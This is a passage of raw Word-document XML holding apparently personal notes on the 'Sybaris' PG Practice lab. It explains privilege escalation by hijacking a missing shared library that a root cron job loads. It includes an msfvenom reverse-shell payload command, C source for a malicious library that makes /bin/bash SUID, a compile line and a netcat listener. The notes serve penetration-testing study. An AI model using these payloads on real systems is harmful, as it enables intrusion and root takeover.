          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="482600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="566" name="image545.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image545.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId779"/>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2477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that it's missing a utils.so (shared library) file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002478">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can try creating our own, putting it in a directory that is included in the LD_LIBRARY_PATH, and it will run it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002479">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look at LD_LIBRARY_PATH for cron job, you can read /etc/crontabs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2463800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="412" name="image411.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image411.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78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247B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And from linPEAS, it also highlighted the directory /usr/local/lib/dev in yellow, meaning we can probably edit. Or we could manually check each directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52" name="image47.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image47.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78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47D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to see that utils.so was the shared library we should exploit is by using "ldd" command on /usr/bin/log-sweeper since we can tell from the existence of "LD_LIBRARY_PATH" that C stuff is there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5005388" cy="1275411"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="545" name="image525.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image525.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId782"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5005388" cy="1275411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000247F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see utils.so is missing!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002480">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit our log-sweeper cron job, all we need to do is generate a malicious shared object file named utils.so and place it in the /usr/local/lib/dev directory. First, we'll generate our malicious shared object file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002481">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x64/shell_reverse_tcp -f elf-so -o utils.so LHOST=kali LPORT=6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002482">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to create malicious .so file is by manually creating it and then compiling it. The msfvenom from above was from the official writeup, while the manual is from the medium writeup:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002483">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002484">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002485">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;sys/types.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002486">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002487">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">static void inject() __attribute__((constructor));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002489">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void inject(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    setgid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    printf("I'm the bad library\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    system("chmod +s /bin/bash");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000248F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002490">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002491">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="835"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put the above in a file called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utils.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002492">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="835"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then compile it into</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002493">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="835"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -shared -o utils.so -fPIC utils.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002494">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll start a Netcat handler to catch our reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002495">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002496">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can upload the file to the target and move it to /usr/local/lib/dev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002497">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then wait for cron job to execute!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002498">
      <w:pPr>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The full official </w:t>
      </w:r>
      <w:hyperlink r:id="rId783">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup is down below. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note they used FTP to upload file, but we had shell access in the medium writeup so we used that instead:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate Cron Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we search for escalation options, we discover that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains a root-run entry that runs every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000249E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SHELL=/bin/bash</w:t>
      </w:r>
    </w:p>
